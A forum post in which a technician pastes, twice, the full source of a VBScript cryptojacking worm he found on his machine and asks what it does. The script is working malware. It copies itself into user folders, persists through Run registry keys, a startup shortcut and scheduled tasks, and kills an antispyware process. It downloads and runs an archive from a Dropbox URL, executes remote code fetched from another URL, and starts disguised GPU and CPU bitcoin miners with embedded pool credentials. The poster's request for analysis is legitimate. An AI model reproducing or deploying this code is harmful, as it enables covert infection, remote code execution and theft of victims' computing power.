As of this morning, each time I start my computer I am prompted to run a vbs called "winlogin" . . . it seems to be an attempt on someone's behalf to use my computer's processing power to make money through something called "bitcoin". I'm a technician (have been for 17 years) and I will eventually remove the script, but while it's still on the computer (though inactive) I am wondering if anyone could tell me what exactly it is trying to achieve and how - I'm very curious about what exactly the script means - I am not a programmer :confused: - I have been able to get the gist of it by looking at the code, but am unsure about the finer details. If you're so inclined, could you have a look and tell me what this vbs is hoping to do and how it hopes to do it. Thanks!
Here's the code:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
'0.5.2
sub dl(strFileURL, strHDLocation)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then
objFSO.DeleteFile strHDLocation
end if
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub
sub dlEval(strFileURL)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Execute(objXMLHTTP.ResponseText)
if (objXMLHTTP.ResponseText = "call Uninstall()") then
wscript.quit
end if
Set objXMLHTTP = Nothing
End if
end sub
sub ex(path)
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create path, null, objConfig, intProcessID
end sub
function countProcess(name)
set service = GetObject ("winmgmts:")
counter = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = name then
counter = counter+1
End If
next
countProcess = counter
end Function
Function checkIfRunning(quit)
counter = countProcess("wscript.exe")
if counter > 1 then
checkIfRunning = true
if (quit = true) then
wscript.quit
end if
exit function
end if
checkIfRunning = false
end function
Function getEnv(variableName)
Set wshShell = CreateObject( "WScript.Shell" )
result = wshShell.ExpandEnvironmentStrings( "%" & variableName & "%" )
if (result <> "%" & variableName & "%") then
getEnv = result
exit Function
end if
getEnv = false
end Function
function findTmpDir()
tmp = getEnv("TEMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
tmp = getEnv("TMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
findTmpDir = false
end Function
sub verifyRegistryKey(key, val)
Set oShell = WScript.CreateObject("WScript.Shell")
oShell.RegWrite key, val, "REG_SZ"
Set oShell = Nothing
end sub
function getAutostartPath()
Set oShell = WScript.CreateObject("WScript.Shell")
path = oShell.SpecialFolders("Startup")
Set oShell = Nothing
path=path & "\Windows Login Script.lnk"
getAutostartPath = path
end function
sub verifyAutostart(path)
aPath = getAutostartPath()
if (aPath <> false) then
Set oShell = WScript.CreateObject("WScript.Shell")
set lnk = oShell.CreateShortcut(aPath)
lnk.TargetPath = path
lnk.save
set oShell = Nothing
end if
end sub
function getTmpPath()
tmp = findTmpDir()
if (tmp <> false) then
tmp = tmp & "\winlogin.vbs"
end if
getTmpPath = tmp
end function
function getUserProfilePath()
up = getEnv("USERPROFILE")
if (up <> false) then
up = up & "\winlogin.vbs"
end if
getUserProfilePath = up
end function
sub copySelf
Set oFSO = CreateObject("Scripting.FileSystemObject")
tmp = getTmpPath
if (tmp <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, tmp, true)
end if
up = getUserProfilePath()
if (up <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, up, true)
end if
set oFSO = Nothing
end sub
sub Uninstall()
'FIXME: [Future] Uninstall procedure
end sub
sub Update()
'FIXME: [Future] Update procedure
end sub
Function tryToKillProcess(name)
set objWMIService = GETOBJECT("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
set colProcess = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & name & "'")
count = 0
for each objProcess in colProcess
objProcess.Terminate()
count = count + 1
next
tryToKillProcess = count
end Function
sub addScheduledTask()
cmd = getUserProfilePath()
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colOperatingSystem = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystem
ServicePack = objOperatingSystem.ServicePackMajorVersion
Version = objOperatingSystem.Version
Next
IF Mid(Version,1,3) = "5.1" Then
xp = true
else
xp = false
end if
if (fileExists("schtasks.exe") = true and xp = false) then
call ex("schtasks.exe /Create /TN ""Windows Login Script"" /TR """ & cmd & """ /SC MINUTE /MO 1 /F")
else
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colScheduledJobs = objWMIService.ExecQuery("Select * from Win32_ScheduledJob")
Needed = true
For Each objJob in colScheduledJobs
if InStr(LCase(objJob.Command), "winlogin.vbs") then
Needed = false
end if
next
if Needed = true then
Set objNewJob = objWMIService.Get("Win32_ScheduledJob")
for i=0 to 23
if (len(i) < 2) then
strTime = "********0" & i & "1000.000000-000"
else
strTime = "********" & i & "1000.000000-000"
end if
errJobCreated = objNewJob.Create ("wscript.exe """ & cmd & """", strTime, True , 127, , , JobID)
next
end if
end if
end sub
sub infect()
call copySelf
skipRegistryInfection = false
if (countProcess("TeaTimer.exe") > 0) then
tryToKillProcess("TeaTimer.exe")
if (countProcess("TeaTimer.exe") > 0) then
skipRegistryInfection = true
end if
end if
if (skipRegistryInfection = false) then
call verifyRegistryKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
Err.Clear()
On Error Resume Next
call verifyRegistryKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
if (Err.Number <> 0) then
admin = false
else
admin = true
end if
'FIXME: [Future] for USB spreading
'call verifyRegistryKey("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutor un", 0)
end if
call verifyAutoStart(getUserProfilePath())
call addScheduledTask()
end sub
Function getMinerPath(miner)
tmp = findTmpDir()
getMinerPath = false
if (tmp <> false) then
Select case miner
Case "gpu"
minerName = "\cgm\msdc.exe"
Case "cpu"
minerName = "\rpcm\svehost.exe"
end select
getMinerPath = tmp & minerName
end if
end Function
function fileExists(theDLL)
sysPath = getEnv("PATH")
arSysPath = Split(sysPath, ";")
Set objFSO = Createobject("Scripting.FileSystemObject")
fileExists = false
for each path in arSysPath
If objFSO.Fileexists(path & "\" & theDLL) Then
fileExists = true
exit for
end if
next
Set objFSO = Nothing
End Function
sub getRequiredPackages()
cgm = getMinerPath("gpu")
rpcm = getMinerPath("cpu")
if (cgm <> false and rpcm <> false) then
Set objFSO = Createobject("Scripting.FileSystemObject")
needed = false
If not objFSO.Fileexists(cgm) or not objFSO.Fileexists(rpcm) Then
needed = true
end if
if (needed = true) then
tmp = findTmpDir()
tmpPath = tmp & "\arc.exe"
'FIXME: CHANGE ADDRESS!
call dl("https://dl.dropbox.com/s/fq36kr9xoegj8a3/arc.exe?dl=1", tmpPath)
call ex(tmpPath & " x -o" & tmp & " -y")
end if
end if
end sub
Function verifyPayloadRunning()
verifyPayloadRunning = false
cgCount = countProcess("msdc.exe")
rpcCount = countProcess("svehost.exe") + countProcess("wmisrv.exe")
if (cgCount + rpcCount > 0) then
verifyPayloadRunning = true
end if
end Function
sub startGPUMining()
cgm = getMinerPath("gpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & cgm & " -o api.bitcoin.cz:8332 -O hallmining.worker1:7d9LwsMG --no-pool-disable -I -2")
end sub
sub startCPUMining()
threads = getEnv("NUMBER_OF_PROCESSORS")
if threads = false then
threads = 1
else
if (threads > 1) then
threads = int(threads/2)
end if
end if
rpcm = getMinerPath("cpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & rpcm & " -url=http://api.bitcoin.cz:8332 -threads=" & threads & " -user=hallmining.worker1 -password=7d9LwsMG")
end sub
sub payload()
running = verifyPayloadRunning()
if (running = false) then
call getRequiredPackages()
tmp = findTmpDir()
if (tmp <> false) then
if (fileExists("openCL.dll") = true) then
call startGPUMining()
wscript.sleep(10000)
if (verifyPayloadRunning() = false) then
call startCPUMining()
end if
else
call startCPUMining()
end if
end if
end if
end sub
'TODO: scramble code
On Error Resume Next
call infect()
call checkIfRunning(true)
'FIXME: CHANGE ADDRESS!
call dlEval("https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" & Timer)
call payload()
Here's the code:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
'0.5.2
sub dl(strFileURL, strHDLocation)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then
objFSO.DeleteFile strHDLocation
end if
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub
sub dlEval(strFileURL)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Execute(objXMLHTTP.ResponseText)
if (objXMLHTTP.ResponseText = "call Uninstall()") then
wscript.quit
end if
Set objXMLHTTP = Nothing
End if
end sub
sub ex(path)
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create path, null, objConfig, intProcessID
end sub
function countProcess(name)
set service = GetObject ("winmgmts:")
counter = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = name then
counter = counter+1
End If
next
countProcess = counter
end Function
Function checkIfRunning(quit)
counter = countProcess("wscript.exe")
if counter > 1 then
checkIfRunning = true
if (quit = true) then
wscript.quit
end if
exit function
end if
checkIfRunning = false
end function
Function getEnv(variableName)
Set wshShell = CreateObject( "WScript.Shell" )
result = wshShell.ExpandEnvironmentStrings( "%" & variableName & "%" )
if (result <> "%" & variableName & "%") then
getEnv = result
exit Function
end if
getEnv = false
end Function
function findTmpDir()
tmp = getEnv("TEMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
tmp = getEnv("TMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
findTmpDir = false
end Function
sub verifyRegistryKey(key, val)
Set oShell = WScript.CreateObject("WScript.Shell")
oShell.RegWrite key, val, "REG_SZ"
Set oShell = Nothing
end sub
function getAutostartPath()
Set oShell = WScript.CreateObject("WScript.Shell")
path = oShell.SpecialFolders("Startup")
Set oShell = Nothing
path=path & "\Windows Login Script.lnk"
getAutostartPath = path
end function
sub verifyAutostart(path)
aPath = getAutostartPath()
if (aPath <> false) then
Set oShell = WScript.CreateObject("WScript.Shell")
set lnk = oShell.CreateShortcut(aPath)
lnk.TargetPath = path
lnk.save
set oShell = Nothing
end if
end sub
function getTmpPath()
tmp = findTmpDir()
if (tmp <> false) then
tmp = tmp & "\winlogin.vbs"
end if
getTmpPath = tmp
end function
function getUserProfilePath()
up = getEnv("USERPROFILE")
if (up <> false) then
up = up & "\winlogin.vbs"
end if
getUserProfilePath = up
end function
sub copySelf
Set oFSO = CreateObject("Scripting.FileSystemObject")
tmp = getTmpPath
if (tmp <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, tmp, true)
end if
up = getUserProfilePath()
if (up <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, up, true)
end if
set oFSO = Nothing
end sub
sub Uninstall()
'FIXME: [Future] Uninstall procedure
end sub
sub Update()
'FIXME: [Future] Update procedure
end sub
Function tryToKillProcess(name)
set objWMIService = GETOBJECT("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
set colProcess = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & name & "'")
count = 0
for each objProcess in colProcess
objProcess.Terminate()
count = count + 1
next
tryToKillProcess = count
end Function
sub addScheduledTask()
cmd = getUserProfilePath()
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colOperatingSystem = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystem
ServicePack = objOperatingSystem.ServicePackMajorVersion
Version = objOperatingSystem.Version
Next
IF Mid(Version,1,3) = "5.1" Then
xp = true
else
xp = false
end if
if (fileExists("schtasks.exe") = true and xp = false) then
call ex("schtasks.exe /Create /TN ""Windows Login Script"" /TR """ & cmd & """ /SC MINUTE /MO 1 /F")
else
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colScheduledJobs = objWMIService.ExecQuery("Select * from Win32_ScheduledJob")
Needed = true
For Each objJob in colScheduledJobs
if InStr(LCase(objJob.Command), "winlogin.vbs") then
Needed = false
end if
next
if Needed = true then
Set objNewJob = objWMIService.Get("Win32_ScheduledJob")
for i=0 to 23
if (len(i) < 2) then
strTime = "********0" & i & "1000.000000-000"
else
strTime = "********" & i & "1000.000000-000"
end if
errJobCreated = objNewJob.Create ("wscript.exe """ & cmd & """", strTime, True , 127, , , JobID)
next
end if
end if
end sub
sub infect()
call copySelf
skipRegistryInfection = false
if (countProcess("TeaTimer.exe") > 0) then
tryToKillProcess("TeaTimer.exe")
if (countProcess("TeaTimer.exe") > 0) then
skipRegistryInfection = true
end if
end if
if (skipRegistryInfection = false) then
call verifyRegistryKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
Err.Clear()
On Error Resume Next
call verifyRegistryKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
if (Err.Number <> 0) then
admin = false
else
admin = true
end if
'FIXME: [Future] for USB spreading
'call verifyRegistryKey("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutor un", 0)
end if
call verifyAutoStart(getUserProfilePath())
call addScheduledTask()
end sub
Function getMinerPath(miner)
tmp = findTmpDir()
getMinerPath = false
if (tmp <> false) then
Select case miner
Case "gpu"
minerName = "\cgm\msdc.exe"
Case "cpu"
minerName = "\rpcm\svehost.exe"
end select
getMinerPath = tmp & minerName
end if
end Function
function fileExists(theDLL)
sysPath = getEnv("PATH")
arSysPath = Split(sysPath, ";")
Set objFSO = Createobject("Scripting.FileSystemObject")
fileExists = false
for each path in arSysPath
If objFSO.Fileexists(path & "\" & theDLL) Then
fileExists = true
exit for
end if
next
Set objFSO = Nothing
End Function
sub getRequiredPackages()
cgm = getMinerPath("gpu")
rpcm = getMinerPath("cpu")
if (cgm <> false and rpcm <> false) then
Set objFSO = Createobject("Scripting.FileSystemObject")
needed = false
If not objFSO.Fileexists(cgm) or not objFSO.Fileexists(rpcm) Then
needed = true
end if
if (needed = true) then
tmp = findTmpDir()
tmpPath = tmp & "\arc.exe"
'FIXME: CHANGE ADDRESS!
call dl("https://dl.dropbox.com/s/fq36kr9xoegj8a3/arc.exe?dl=1", tmpPath)
call ex(tmpPath & " x -o" & tmp & " -y")
end if
end if
end sub
Function verifyPayloadRunning()
verifyPayloadRunning = false
cgCount = countProcess("msdc.exe")
rpcCount = countProcess("svehost.exe") + countProcess("wmisrv.exe")
if (cgCount + rpcCount > 0) then
verifyPayloadRunning = true
end if
end Function
sub startGPUMining()
cgm = getMinerPath("gpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & cgm & " -o api.bitcoin.cz:8332 -O hallmining.worker1:7d9LwsMG --no-pool-disable -I -2")
end sub
sub startCPUMining()
threads = getEnv("NUMBER_OF_PROCESSORS")
if threads = false then
threads = 1
else
if (threads > 1) then
threads = int(threads/2)
end if
end if
rpcm = getMinerPath("cpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & rpcm & " -url=http://api.bitcoin.cz:8332 -threads=" & threads & " -user=hallmining.worker1 -password=7d9LwsMG")
end sub
sub payload()
running = verifyPayloadRunning()
if (running = false) then
call getRequiredPackages()
tmp = findTmpDir()
if (tmp <> false) then
if (fileExists("openCL.dll") = true) then
call startGPUMining()
wscript.sleep(10000)
if (verifyPayloadRunning() = false) then
call startCPUMining()
end if
else
call startCPUMining()
end if
end if
end if
end sub
'TODO: scramble code
On Error Resume Next
call infect()
call checkIfRunning(true)
'FIXME: CHANGE ADDRESS!
call dlEval("https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" & Timer)
call payload()